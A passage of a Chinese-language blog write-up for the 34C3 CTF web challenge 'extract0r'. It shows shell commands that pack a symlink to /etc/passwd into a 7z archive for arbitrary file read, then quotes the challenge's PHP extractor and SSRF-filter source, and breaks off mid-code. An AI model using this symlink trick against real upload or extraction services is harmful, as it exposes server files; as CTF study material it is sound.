<!DOCTYPE html>
<html lang="en">
  <head><meta name="generator" content="Hexo 3.8.0"><meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">


<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">

<meta name="theme-color" content="#f8f5ec">
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">

<meta name="description" content="34c3 web extract0r!"><meta name="keywords" content="cyber security"><link rel="alternate" href="/atom.xml" title="Never Stop Exploiting"><link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=2.11.0">
<link rel="canonical" href="https://rebirthwyw.com/2018/01/04/34c3-web-extract0r/">

<link rel="stylesheet" type="text/css" href="/lib/fancybox/jquery.fancybox.css"><link rel="stylesheet" type="text/css" href="/lib/nprogress/nprogress.min.css"><script type="text/x-mathjax-config">
    MathJax.Hub.Config({ tex2jax: { inlineMath: [['$','$'], ['\\(','\\)']] } });
  </script>
  <script type="text/javascript" async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML"></script>
<link rel="stylesheet" type="text/css" href="/css/style.css?v=2.11.0">

<script id="baidu_push">
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
<script>
  window.config = {"leancloud":{"app_id":null,"app_key":null},"toc":true,"fancybox":true,"pjax":true,"latex":true};
</script>

    <title>34c3 web extract0r! - Never Stop Exploiting</title>
  </head>

  <body><div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="/." class="logo">Never Stop Exploiting</a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>

<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list"><a href="/archives/">
        <li class="mobile-menu-item">Archives
          </li>
      </a><a href="/about">
        <li class="mobile-menu-item">About
          </li>
      </a><a href="/links">
        <li class="mobile-menu-item">Links
          </li>
      </a></ul>
</nav>
<div class="container" id="mobile-panel">
      <header id="header" class="header"><div class="logo-wrapper">
  <a href="/." class="logo">Never Stop Exploiting</a>
</div>

<nav class="site-navbar"><ul id="menu" class="menu"><li class="menu-item">
          <a class="menu-item-link" href="/archives/">
            Archives
            </a>
        </li>
      <li class="menu-item">
          <a class="menu-item-link" href="/about">
            About
            </a>
        </li>
      <li class="menu-item">
          <a class="menu-item-link" href="/links">
            Links
            </a>
        </li>
      </ul></nav>
</header>

      <main id="main" class="main">
        <div class="content-wrapper">
          <div id="content" class="content"><article class="post">
    <header class="post-header">
      <h1 class="post-title">34c3 web extract0r!
        </h1>

      <div class="post-meta">
        <span class="post-time">
          2018-01-04
        </span></div>
    </header>

    <div class="post-toc" id="post-toc">
    <h2 class="post-toc-title">Contents</h2>
    <div class="post-toc-content">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#任意文件读取"><span class="toc-text">任意文件读取</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#任意列目录"><span class="toc-text">任意列目录</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SSRF"><span class="toc-text">SSRF</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#绕过url-php"><span class="toc-text">绕过url.php</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#mysql构造压缩包"><span class="toc-text">mysql构造压缩包</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#构造tcp包"><span class="toc-text">构造tcp包</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#gopher发包"><span class="toc-text">gopher发包</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#大功告成"><span class="toc-text">大功告成</span></a></li></ol>
    </div>
  </div><div class="post-content"><p>题目的源码已经放出来了，感兴趣的可以去github上看一下<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://github.com/eboda/34c3ctf/tree/master/extract0r</span><br></pre></td></tr></table></figure></p>
<h2 id="任意文件读取"><a href="#任意文件读取" class="headerlink" title="任意文件读取"></a>任意文件读取</h2><p><img src="/2018/01/04/34c3-web-extract0r/1.png" alt="index"><br>上来页面很简单，一个可以上传压缩文件的页面。点击extract it!可以完成解压。这里很容易想到之前pwnhub也出过的一个题目，通过软链接来达到任意文件读取。但是tar格式的压缩文件却解压失败了。尝试以后会发现这个是一个7z格式的文件解压。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ln -s /etc/passwd a</span><br><span class="line">7z a -t7z 1.7z a</span><br></pre></td></tr></table></figure></p>
<p><img src="/2018/01/04/34c3-web-extract0r/2.png" alt="/etc/passwd"><br><figure class="highlight php"><figcaption><span>index.php</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">session_start();</span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span> <span class="string">"url.php"</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">get_directory</span><span class="params">($new=false)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (!<span class="keyword">isset</span>($_SESSION[<span class="string">"directory"</span>]) || $new) &#123;</span><br><span class="line">        $_SESSION[<span class="string">"directory"</span>] = <span class="string">"files/"</span> . sha1(random_bytes(<span class="number">100</span>));</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    $directory = $_SESSION[<span class="string">"directory"</span>];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!is_dir($directory)) &#123;</span><br><span class="line">        mkdir($directory);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> $directory;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">clear_directory</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    $dir = get_directory();</span><br><span class="line">    $files = glob($dir . <span class="string">'/*'</span>); </span><br><span class="line">    <span class="keyword">foreach</span>($files <span class="keyword">as</span> $file) &#123; </span><br><span class="line">        <span class="keyword">if</span>(is_file($file) || is_link($file)) &#123;</span><br><span class="line">            unlink($file); </span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (is_dir($file)) &#123;</span><br><span class="line">            rmdir($file);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">verify_archive</span><span class="params">($path)</span> </span>&#123;</span><br><span class="line">    $res = shell_exec(<span class="string">"7z l "</span> . escapeshellarg($path) . <span class="string">" -slt"</span>);</span><br><span class="line">    $line = strtok($res, <span class="string">"\n"</span>);</span><br><span class="line">    $file_cnt = <span class="number">0</span>;</span><br><span class="line">    $total_size = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span> ($line !== <span class="keyword">false</span>) &#123;</span><br><span class="line">        preg_match(<span class="string">"/^Size = ([0-9]+)/"</span>, $line, $m);</span><br><span class="line">        <span class="keyword">if</span> ($m) &#123;</span><br><span class="line">            $file_cnt++;</span><br><span class="line">            $total_size += (int)$m[<span class="number">1</span>];</span><br><span class="line">        &#125;</span><br><span class="line">        $line = strtok( <span class="string">"\n"</span> );</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> ($total_size === <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">"Archive's size 0 not supported"</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> ($total_size &gt; <span class="number">1024</span>*<span class="number">10</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">"Archive's total uncompressed size exceeds 10KB"</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> ($file_cnt === <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">"Archive is empty"</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> ($file_cnt &gt; <span class="number">5</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">"Archive contains more than 5 files"</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">verify_extracted</span><span class="params">($directory)</span> </span>&#123;</span><br><span class="line">    $files = glob($directory . <span class="string">'/*'</span>); </span><br><span class="line">    $cntr = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">foreach</span>($files <span class="keyword">as</span> $file) &#123;</span><br><span class="line">        <span class="keyword">if</span> (!is_file($file)) &#123;</span><br><span class="line">            $cntr++;</span><br><span class="line">            unlink($file);</span><br><span class="line">            @rmdir($file);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> $cntr;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">decompress</span><span class="params">($s)</span> </span>&#123;</span><br><span class="line">    $directory = get_directory(<span class="keyword">true</span>);</span><br><span class="line">    $archive =  tempnam(<span class="string">"/tmp"</span>, <span class="string">"archive_"</span>);</span><br><span class="line"></span><br><span class="line">    file_put_contents($archive, $s);</span><br><span class="line">    $error = verify_archive($archive);</span><br><span class="line">    <span class="keyword">if</span> ($error) &#123;</span><br><span class="line">        unlink($archive);</span><br><span class="line">        error($error);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    shell_exec(<span class="string">"7z e "</span>. escapeshellarg($archive) . <span class="string">" -o"</span> . escapeshellarg($directory) . <span class="string">" -y"</span>);</span><br><span class="line">    unlink($archive);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> verify_extracted($directory);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">error</span><span class="params">($s)</span> </span>&#123;</span><br><span class="line">    clear_directory();</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">"&lt;h2&gt;&lt;b&gt;ERROR&lt;/b&gt;&lt;/h2&gt; "</span> . htmlspecialchars($s));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$msg = <span class="string">""</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">"url"</span>])) &#123;</span><br><span class="line">    $page =  get_contents($_GET[<span class="string">"url"</span>]);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (strlen($page) === <span class="number">0</span>) &#123;</span><br><span class="line">        error(<span class="string">"0 bytes fetched. Looks like your file is empty."</span>);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        $deleted_dirs = decompress($page);</span><br><span class="line">        $msg = <span class="string">"&lt;h3&gt;Done!&lt;/h3&gt; Your files were extracted if you provided a valid archive."</span>;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> ($deleted_dirs &gt; <span class="number">0</span>) &#123;</span><br><span class="line">            $msg .= <span class="string">"&lt;h3&gt;WARNING:&lt;/h3&gt; we have deleted some folders from your archive for security reasons with our &lt;a href='cyber_filter'&gt;cyber-enabled filtering system&lt;/a&gt;!"</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br><span class="line">&lt;html&gt;</span><br><span class="line">    &lt;head&gt;&lt;title&gt;extract0r!&lt;/title&gt;&lt;/head&gt;</span><br><span class="line">    &lt;body&gt;</span><br><span class="line">        &lt;form&gt;</span><br><span class="line">            &lt;h1&gt;extract0r - secure file extraction service&lt;/h1&gt;</span><br><span class="line">            &lt;p&gt;&lt;b&gt;Your Archive:&lt;/b&gt;&lt;/p&gt;</span><br><span class="line">            &lt;p&gt;&lt;input type=<span class="string">"text"</span> size=<span class="string">"100"</span> name=<span class="string">"url"</span>&gt;&lt;/p&gt;</span><br><span class="line">            &lt;p&gt;&lt;input type=<span class="string">"submit"</span> value=<span class="string">"Extract it!"</span>&gt;&lt;/p&gt;</span><br><span class="line">        &lt;/form&gt;</span><br><span class="line"></span><br><span class="line">        &lt;p&gt;Your extracted files will appear &lt;a href=<span class="string">"&lt;?= htmlspecialchars(get_directory()) ?&gt;"</span>&gt;here&lt;/a&gt;.&lt;/p&gt;</span><br><span class="line">        <span class="meta">&lt;?php</span> <span class="keyword">if</span> (!<span class="keyword">empty</span>($msg)) <span class="keyword">echo</span> <span class="string">"&lt;hr&gt;&lt;p&gt;"</span> . $msg . <span class="string">"&lt;/p&gt;"</span>; <span class="meta">?&gt;</span></span><br><span class="line">    &lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure></p>
<figure class="highlight php"><figcaption><span>url.php</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">in_cidr</span><span class="params">($cidr, $ip)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">list</span>($prefix, $mask) = explode(<span class="string">"/"</span>, $cidr);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span> === (((ip2long($ip) ^ ip2long($prefix)) &gt;&gt; (<span class="number">32</span>-$mask)) &lt;&lt; (<span class="number">32</span>-$mask));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">get_port</span><span class="params">($url_parts)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (array_key_exists(<span class="string">"port"</span>, $url_parts)) &#123;</span><br><span class="line">        <span class="keyword">return</span> $url_parts[<span class="string">"port"</span>];</span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="keyword">if</span> (array_key_exists(<span class="string">"scheme"</span>, $url_parts)) &#123;</span><br><span class="line">        <span class="keyword">return</span> $url_parts[<span class="string">"scheme"</span>] === <span class="string">"https"</span> ? <span class="number">443</span> : <span class="number">80</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="number">80</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">clean_parts</span><span class="params">($parts)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// oranges are not welcome here</span></span><br><span class="line">    $blacklisted = <span class="string">"/[ \x08\x09\x0a\x0b\x0c\x0d\x0e:\d]/"</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (array_key_exists(<span class="string">"scheme"</span>, $parts)) &#123;</span><br><span class="line">        $parts[<span class="string">"scheme"</span>] = preg_replace($blacklisted, <span class="string">""</span>, $parts[<span class="string">"scheme"</span>]);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (array_key_exists(<span class="string">"user"</span>, $parts)) &#123;</span><br><span class="line">        $parts[<span class="string">"user"</span>] = preg_replace($blacklisted, <span class="string">""</span>, $parts[<span class="string">"user"</span>]);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (array_key_exists(<span class="string">"pass"</span>, $parts)) &#123;</span><br><span class="line">        $parts[<span class="string">"pass"</span>] = preg_replace($blacklisted, <span class="string">""</span>, $parts[<span class="string">"pass"</span>]);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (array_key_exists(<span class="string">"host"</span>, $parts)) &#123;</span><br><span class="line">        $parts[<span class="string">"host"</span>] = preg_replace($blacklisted, <span class="string">""</span>, $parts[<span class="string">"host"</span>]);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> $parts;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">rebuild_url</span><span class="params">($parts)</span> </span>&#123;</span><br><span class="line">    $url = <span class="string">""</span>;</span><br><span class="line">    $url .= $parts[<span class="string">"scheme"</span>] . <span class="string">"://"</span>;</span><br><span class="line">    $url .= !<span class="keyword">empty</span>($parts[<span class="string">"user"</span>]) ? $parts[<span class="string">"user"</span>] : <span class="string">""</span>;</span><br><span class="line">    $url .= !<span class="keyword">empty</span>($parts[<span class="string">"pass"</span>]) ? <span class="string">":"</span> . $parts[<span class="string">"pass"</span>] : <span class="string">""</span>;</span><br><span class="line">    $url .= (!<span class="keyword">empty</span>($parts[<span class="string">"user"</span>]) || !<span class="keyword">empty</span>($parts[<span class="string">"pass"</span>])) ? <span class="string">"@"</span> : <span class="string">""</span>;</span><br><span class="line">    $url .= $parts[<span class="string">"host"</span>];</span><br><span class="line">    $url .= !<span class="keyword">empty</span>($parts[<span class="string">"port"</span>]) ? <span class="string">":"</span> . (int) $parts[<span class="string">"port"</span>] : <span class="string">""</span>;</span><br><span class="line">    $url .= !<span class="keyword">empty</span>($parts[<span class="string">"path"</span>]) ? <span class="string">"/"</span> . substr($parts[<span class="string">"path"</span>], <span class="number">1</span>) : <span class="string">""</span>;</span><br><span class="line">    $url .= !<span class="keyword">empty</span>($parts[<span class="string">"query"</span>]) ? <span class="string">"?"</span> . $parts[<span class="string">"query"</span>] : <span class="string">""</span>;</span><br><span class="line">    $url .= !<span class="keyword">empty</span>($parts[<span class="string">"fragment"</span>]) ? <span class="string">"#"</span> . $parts[<span class="string">"fragment"</span>] : <span class="string">""</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> $url;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">get_contents</span><span class="params">($url)</span> </span>&#123;</span><br><span class="line">    $disallowed_cidrs = [ <span class="string">"127.0.0.0/8"</span>, <span class="string">"169.254.0.0/16"</span>, <span class="string">"0.0.0.0/8"</span>,</span><br><span class="line">        <span class="string">"10.0.0.0/8"</span>, <span class="string">"192.168.0.0/16"</span>, <span class="string">"14.0.0.0/8"</span>, <span class="string">"24.0.0.0/8"</span>, </span><br><span class="line">        <span class="string">"172.16.0.0/12"</span>, <span class="string">"191.255.0.0/16"</span>, <span class="string">"192.0.0.0/24"</span>, <span class="string">"192.88.99.0/24"</span>,</span><br><span class="line">        <span class="string">"255.255.255.255/32"</span>, <span class="string">"240.0.0.0/4"</span>, <span class="string">"224.0.0.0/4"</span>, <span class="string">"203.0.113.0/24"</span>, </span><br><span class="line">        <span class="string">"198.51.100.0/24"</span>, <span class="string">"198.18.0.0/15"</span>,  <span class="string">"192.0.2.0/24"</span>, <span class="string">"100.64.0.0/10"</span> ];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> ($i = <span class="number">0</span>; $i &lt; <span class="number">5</span>; $i++) &#123;</span><br><span class="line">        $url_parts = clean_parts(parse_url($url));</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (!$url_parts) &#123;</span><br><span class="line">            error(<span class="string">"Couldn't parse your url!"</span>);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (!array_key_exists(<span class="string">"scheme"</span>, $url_parts)) &#123;</span><br><span class="line">            error(<span class="string">"There was no scheme in your url!"</span>);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (!array_key_exists(<span class="string">"host"</span>, $url_parts)) &#123;</span><br><span class="line">            error(<span class="string">"There was no host in your url!"</span>);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        $port = get_port($url_parts);</span><br><span class="line">        $host = $url_parts[<span class="string">"host"</span>];</span><br><span class="line"></span><br><span class="line">        $ip = gethostbynamel($host)[<span class="number">0</span>];</span><br><span class="line">        <span class="keyword">if</span> (!filter_var($ip, FILTER_VALIDATE_IP, </span><br><span class="line">            FILTER_FLAG_IPV4|FILTER_FLAG_NO_PRIV_RANGE|FILTER_FLAG_NO_RES_RANGE)) &#123;</span><br><span class="line">            error(<span class="string">"Couldn't resolve your host '&#123;$host&#125;' or </span></span><br><span class="line"><span class="string">                the resolved ip '&#123;$ip&#125;' is blacklisted!"</span>);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">foreach</span> ($disallowed_cidrs <span class="keyword">as</span> $cidr) &#123;</span><br><span class="line">            <span class="keyword">if</span> (in_cidr($cidr, $ip)) &#123;</span><br><span class="line">                error(<span class="string">"That IP is in a blacklisted range (&#123;$cidr&#125;)!"</span>);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// all good, rebuild url now</span></span><br><span class="line">        $url = rebuild_url($url_parts);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">        $curl = curl_init();</span><br><span class="line">        curl_setopt($curl, CURLOPT_URL, $url);</span><br><span class="line">        curl_setopt($curl, CURLOPT_RETURNTRANSFER, <span class="keyword">true</span>);</span><br><span class="line">        curl_setopt($curl, CURLOPT_MAXREDIRS, <span class="number">0</span>);</span><br><span class="line">        curl_setopt($curl, CURLOPT_TIMEOUT, <span class="number">3</span>);</span><br><span class="line">        curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, <span class="number">3</span>);</span><br><span class="line">        curl_setopt($curl, CURLOPT_RESOLVE, <span class="keyword">array</span>($host . <span class="string">":"</span> . $port . <span class="string">":"</span> . $ip)); </span><br><span class="line">        curl_setopt($curl, CURLOPT_PORT, $port);</span><br><span class="line"></span><br><span class="line">        $data = curl_exec($curl);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (curl_error($curl)) &#123;</span><br><span class="line">            error(curl_error($curl));</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        $status = curl_getinfo($curl, CURLINFO_HTTP_CODE);</span><br><span class="line">        <span class="keyword">if</span> ($status &gt;= <span class="number">301</span> <span class="keyword">and</span> $status &lt;= <span class="number">308</span>) &#123;</span><br><span class="line">            $url = curl_getinfo($curl, CURLINFO_REDIRECT_URL);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> $data;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    error(<span class="string">"More than 5 redirects!"</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h2 id="任意列目录"><a href="#任意列目录" class="headerlink" title="任意列目录"></a>任意列目录</h2><p>两天被卡在这个点上面也是萌萌哒了。。。比赛时候一直想着绕过url.php等等的事情，或者读一些敏感文件，没去想着列目录。<br><figure class="highlight php"><figcaption><span>url.php</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">verify_extracted</span><span class="params">($directory)</span> </span>&#123;</span><br><span class="line">    $files = glob($directory . <span class="string">'/*'</span>); </span><br><span class="line">    $cntr = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">foreach</span>($files <span class="keyword">as</span> $file) &#123;</span><br><span class="line">        <span class="keyword">if</span> (!is_file($file)) 